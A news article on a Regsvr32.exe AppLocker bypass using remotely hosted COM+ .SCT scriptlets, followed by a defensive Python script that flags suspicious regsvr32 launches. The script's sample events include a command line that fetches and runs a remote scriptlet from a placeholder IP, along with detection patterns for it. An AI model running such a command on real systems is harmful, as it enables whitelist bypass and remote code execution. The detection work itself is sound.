A new security flaw has been found in Windows that allows users to bypass the AppLocker application whitelisting protection and could result in remote code execution.
By using the Windows command line utility Regsvr32.exe, security researcher Casey Smith was able to circumvent AppLocker's whitelist protections by pointing it at a file or location controlled by a potential attacker. The security flaw affects business editions of Windows 7, 8, and 10 and can be utilised to run any application on a PC running Windows.
Smith noted that the flaw can be exploited even by a user who does not have administrator rights or privileged access. He detailed his findings in a blog post where he illustrated that COM+ scripts can be used to bypass AppLocker. These scripts are essentially XML documents that are responsible for registering COM objects used by the internal system of a Windows PC.
The exploit also operates without the need for tampering with the PC, which leaves little evidence to suggest that an attack even occurred.
COM+ scripts, which are also known as .SCT files, are not bound to local access and can be deployed remotely. Smith was able to pull up the script remotely by hosting the .SCT file in a location he controlled: “It's not well documented that Regsvr32.exe can accept a URL for a script. In order to trigger this bypass, place the code block, either VB or JS, inside the element.”
Smith has made proof-of-concept code available on GitHub for users who want to learn more about how the exploit works. As a patch is not currently available for the security flaw, users can protect themselves by blocking Regsvr32.exe in Windows Firewall.
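Blocking Regsvr32.exe in the firewall is one control; logging process command lines is the complementary detection. As an added illustration (not from the article or from Smith's proof of concept), the following Python triage function flags regsvr32.exe launches whose arguments reference a URL, a .SCT scriptlet, or the scriptlet host DLL, run over constructed Event ID 4688-style records; the field names and sample values are assumptions.

```python
"""Flag regsvr32.exe launches that reference a remote or local COM+ scriptlet."""
import re

# Constructed sample Event ID 4688-style records; not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"pid": 1002, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /i:http://198.51.100.7/update.sct scrobj.dll"},
    {"pid": 1003, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /u C:\Users\alice\Downloads\helper.sct"},
    {"pid": 1004, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe http://intranet/readme.txt"},
]

# Regsvr32 accepts a URL for its script location, so any URL in its arguments is notable.
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")
# A COM+ scriptlet (.SCT) file, whether fetched remotely or staged locally.
SCT_RE = re.compile(r"(?i)\.sct\b")
# The script host DLL that executes scriptlets; legitimate registrations rarely name it.
SCROBJ_RE = re.compile(r"(?i)\bscrobj\.dll\b")


def is_regsvr32(image: str) -> bool:
    """Match on the executable name only, so both System32 and SysWOW64 copies count."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "regsvr32.exe"


def classify(event: dict) -> list[str]:
    """Return the reasons an event is suspicious; an empty list means nothing matched."""
    if not is_regsvr32(event["image"]):
        return []
    cmd = event["cmdline"]
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("remote-url")
    if SCT_RE.search(cmd):
        reasons.append("sct-scriptlet")
    if SCROBJ_RE.search(cmd):
        reasons.append("scrobj-dll")
    return reasons


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map each suspicious event's pid to its reasons, dropping benign events."""
    return {e["pid"]: r for e in events if (r := classify(e))}


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(reasons)}")
```

A local .SCT registration is flagged as well as a remote one, because the firewall block does not stop a scriptlet that was already copied to disk.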